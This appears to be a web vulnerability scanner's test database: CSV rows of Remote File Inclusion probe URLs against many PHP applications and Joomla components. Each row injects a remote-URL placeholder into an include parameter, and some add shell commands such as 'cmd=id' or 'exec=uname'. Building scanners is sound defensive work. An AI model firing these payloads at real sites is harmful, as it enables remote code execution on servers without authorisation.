"004359","CVE-2002-2019","c","/catalog/includes/include_once.php?include_file=@RFIURL","GET","PHP Version","","","","","phpWebSite or osCommerce remote File Inclusion (RFI).","","" "004360","https://gist.github.com/mubix/5d269c686584875015a2","c","/catalogshop.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004361","https://gist.github.com/mubix/5d269c686584875015a2","c","/cdsagenda/modification/SendAlertEmail.php?AGE=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004362","https://gist.github.com/mubix/5d269c686584875015a2","c","/cfagcms/themes/default/index.php?main=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004363","https://gist.github.com/mubix/5d269c686584875015a2","c","/ch_readalso.php?read_xml_include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004364","https://gist.github.com/mubix/5d269c686584875015a2","c","/challenge.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004365","https://gist.github.com/mubix/5d269c686584875015a2","c","/challenge.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004366","https://gist.github.com/mubix/5d269c686584875015a2","c","/change_preferences2.php?target=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004367","https://gist.github.com/mubix/5d269c686584875015a2","c","/chat.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004368","https://gist.github.com/mubix/5d269c686584875015a2","c","/chat.php?my[root]=@RFIURL?cm=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004369","https://gist.github.com/mubix/5d269c686584875015a2","c","/chat/adminips.php?banned_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004370","https://gist.github.com/mubix/5d269c686584875015a2","c","/chat/users_popupL.php3?From=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004371","https://gist.github.com/mubix/5d269c686584875015a2","c","/checkout.php?abs_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004372","https://gist.github.com/mubix/5d269c686584875015a2","c","/checkout.php?abs_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004373","https://gist.github.com/mubix/5d269c686584875015a2","c","/ciamos_path/modules/forum/include/config.php?module_cache_path='@RFIURL'","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004374","https://gist.github.com/mubix/5d269c686584875015a2","c","/circ.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004375","https://gist.github.com/mubix/5d269c686584875015a2","c","/circolari/cir_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004376","https://gist.github.com/mubix/5d269c686584875015a2","c","/citywriter/head.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004377","https://gist.github.com/mubix/5d269c686584875015a2","c","/cl_files/index.php?path_to_calendar=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004378","https://gist.github.com/mubix/5d269c686584875015a2","c","/claroline/auth/ldap/authldap.php?includePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004379","https://gist.github.com/mubix/5d269c686584875015a2","c","/claroline/phpbb/page_tail.php?includePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004380","https://gist.github.com/mubix/5d269c686584875015a2","c","/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004381","https://gist.github.com/mubix/5d269c686584875015a2","c","/class.mysql.php?path_to_bt_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004382","https://gist.github.com/mubix/5d269c686584875015a2","c","/class/Wiki/Wiki.php?c_node[class_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004383","https://gist.github.com/mubix/5d269c686584875015a2","c","/class/jpcache/jpcache.php?_PSL[classdir]=@RFIURL?exec=uname","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004384","https://gist.github.com/mubix/5d269c686584875015a2","c","/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004385","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004386","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004387","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004388","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004389","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004390","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004391","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004392","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004393","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004394","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004395","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004396","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004397","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004398","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004399","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004400","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004401","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004402","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Cache.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004403","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Customer.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004404","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Performance.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004405","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Project.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004406","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/Representative.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004407","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/User.class.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004408","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/admin_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004409","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/adodbt/sql.php?classes_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004410","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/adodbt/sql.php?classes_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004411","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/board_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004412","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/class_admin.php?PathToComment=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004413","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/class_comments.php?PathToComment=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004414","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/class_mail.inc.php?path_to_folder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004415","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/common.php?rootdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004416","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/core/language.php?rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004417","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/dev_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004418","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/file_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004419","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/html/com_articles.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004420","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/phpmailer/class.cs_phpmailer.php?classes_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004421","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/query.class.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004422","https://gist.github.com/mubix/5d269c686584875015a2","c","/classes/tech_o.php?absolutepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004423","https://gist.github.com/mubix/5d269c686584875015a2","c","/classified.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004424","https://gist.github.com/mubix/5d269c686584875015a2","c","/classified_right.php?language_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004425","https://gist.github.com/mubix/5d269c686584875015a2","c","/classifieds/index.php?lowerTemplate=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004426","https://gist.github.com/mubix/5d269c686584875015a2","c","/clear.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004427","https://gist.github.com/mubix/5d269c686584875015a2","c","/clearinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004428","https://gist.github.com/mubix/5d269c686584875015a2","c","/click.php?dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004429","https://gist.github.com/mubix/5d269c686584875015a2","c","/client.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004430","https://gist.github.com/mubix/5d269c686584875015a2","c","/client/faq_1/PageController.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004431","https://gist.github.com/mubix/5d269c686584875015a2","c","/clients/index.php?src=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004432","https://gist.github.com/mubix/5d269c686584875015a2","c","/cls_fast_template.php?fname=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004433","https://gist.github.com/mubix/5d269c686584875015a2","c","/cm68news/engine/oldnews.inc.php?addpath=@RFIURL?&","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004434","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004435","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/ManagerResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004436","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004437","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/RegForm.class.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004438","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/RegResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004439","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/RegRightsResource.class.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004440","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/meetweb/classes/modules.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004441","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/modules/form.lib.php?sourceFolder=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004442","https://gist.github.com/mubix/5d269c686584875015a2","c","/cms/system/openengine.php?oe_classpath=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004443","https://gist.github.com/mubix/5d269c686584875015a2","c","/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004444","https://gist.github.com/mubix/5d269c686584875015a2","c","/cn_config.php?tpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004445","https://gist.github.com/mubix/5d269c686584875015a2","c","/coast/header.php?sections_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004446","https://gist.github.com/mubix/5d269c686584875015a2","c","/code/berylium-classes.php?beryliumroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004447","https://gist.github.com/mubix/5d269c686584875015a2","c","/code/berylium-classes.php?beryliumroot=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004448","https://gist.github.com/mubix/5d269c686584875015a2","c","/code/display.php?admindir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004449","https://gist.github.com/mubix/5d269c686584875015a2","c","/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004450","https://gist.github.com/mubix/5d269c686584875015a2","c","/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004451","https://gist.github.com/mubix/5d269c686584875015a2","c","/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004452","https://gist.github.com/mubix/5d269c686584875015a2","c","/com_media_library/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004453","https://gist.github.com/mubix/5d269c686584875015a2","c","/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004454","https://gist.github.com/mubix/5d269c686584875015a2","c","/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004455","https://gist.github.com/mubix/5d269c686584875015a2","c","/comments.php?AMG_serverpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004456","https://gist.github.com/mubix/5d269c686584875015a2","c","/comments.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004457","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.inc.php?CFG[libdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004458","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.inc.php?CFG[libdir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004459","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.inc.php?base_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004460","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?db_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004461","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004462","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?ezt_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004463","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004464","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?livealbum_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004465","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?livealbum_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004466","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?locale=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004467","https://gist.github.com/mubix/5d269c686584875015a2","c","/common.php?phpht_real_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004468","https://gist.github.com/mubix/5d269c686584875015a2","c","/common/db.php?commonpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004469","https://gist.github.com/mubix/5d269c686584875015a2","c","/common/func.php?CommonAbsD=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004470","https://gist.github.com/mubix/5d269c686584875015a2","c","/common/func.php?CommonAbsDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004471","https://gist.github.com/mubix/5d269c686584875015a2","c","/community/Offline.php?sourcedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004472","https://gist.github.com/mubix/5d269c686584875015a2","c","/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004473","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/calendar/com_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004474","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/calendar/com_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004475","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004476","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004477","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004478","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004479","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_articles.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004480","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_articles.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004481","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004482","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004483","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004484","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_cpg/cpg.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004485","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004486","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_facileforms/facileforms.frame.php?ff_compath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004487","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_forum/download.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004488","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_galleria/galleria.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004489","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_guestbook.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004490","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_hashcash/server.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004491","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004492","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004493","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004494","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_joomlaboard/file_upload.php?sbp=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004495","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004496","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_lm/archive.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004497","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mambowiki/MamboLogin.php?IP=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004498","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_minibb.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004499","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004500","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004501","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mospray/scripts/admin.php?basedir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004502","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004503","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_mp3_allopass/allopass.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004504","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004505","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004506","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 